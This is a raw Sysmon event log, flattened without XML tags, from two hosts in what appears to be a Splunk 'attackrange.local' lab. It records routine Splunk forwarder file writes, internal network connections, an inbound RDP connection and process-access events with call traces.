Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6AED793FDBDBE09A70298BD1009B0027,SHA256=0D89947F51C053AD44657DCA96066C3183F216A0463CCD0E0F766E37999B024A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:19.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8BBF74879B65BCAC5B187C4A1D334556,SHA256=5A3B20D773FEA61084D9FEDC858FD20D1CDB3D9523E54845335A1266220DBAE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:20.650{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55B3D941B76AC9128D784D5D0E964A25,SHA256=020FE1EDA03E15E7B942EB09C2DF566EB2465A800E54BD74CD78B2603AF730F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:20.506{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:19.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57278-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:20.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F83E08D872AD99FD65119ADB0D775A8,SHA256=9791407B60F487506CEA8EFDFCFD88EE3C1E6B696208FC0E5F80B4A642499A58,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:12.672{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51039-false10.0.1.12-8000- 354300x80000000000000001049281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:12.136{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-62256-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001049280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:20.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F2766E7F4B32FF97C48A8BC2487B983,SHA256=5B332C3A8FB4010BE342C4DB5BC66A8C7EB0D0A2541B43BEF48F3D54E22F2C02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:21.665{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD425020F37CD12EC46CC5C331DC2DEA,SHA256=E649ADEAF15B569F568D0BCEEE7F2590AC2A883715B21617F664234C00EA1370,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:21.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=734DF1FC7FB7BB8A8D113F09FB090E2F,SHA256=56509F043641667A347730044A08A8428EB1D995A63ED5561A175D7984C445CE,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001049284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:21.250{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-6E0B-00000000CF01}6608C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:22.680{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9BA11EB4A1290E47149E5D49D684C18,SHA256=6F5130746BA884CF282D2890303B8357765B8F986EF26AE8741FF23A5B1A0E41,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:20.639{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57279-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000807718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:22.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56E3CC49790DB0081A55FC003974F14B,SHA256=1467D94C1E8346A9A00031AF45307AD9B13813E1A9F03FB96CED48A2B6744734,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001049290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:23.695{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEACA30DCF7A1F133D116A31DC473FC1,SHA256=81EDC9F80677940410B222DD98E6410C6DFB91D928AF89D51219348CF447E0D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:23.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F81D1CDAFC79C97664884F7998A91493,SHA256=CC53A11693A5B48A0BF8124D17FD751673A82E9ADA2B69E78BF3D15337076C1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:23.530{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a26e|C:\Windows\System32\ole32.dll+89b6b|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x80000000000000001049288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:23.529{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+b5f62|C:\Windows\System32\ole32.dll+89b39|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x80000000000000001049287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:23.249{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 23542300x80000000000000001049291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:24.710{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE288ACF401549AC3EEEDE3C4B561034,SHA256=F5B628FCEC7874A080FE3CDED3B38A59D4950A272A008D59729C3E04EE665D0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F4-60EB-7B79-00000000D001}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:24.975{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.959{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:24.959{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.959{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.959{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F4F4-60EB-7B79-00000000D001}1904C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.959{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F4-60EB-7B79-00000000D001}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:24.960{0C1E0330-F4F4-60EB-7B79-00000000D001}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
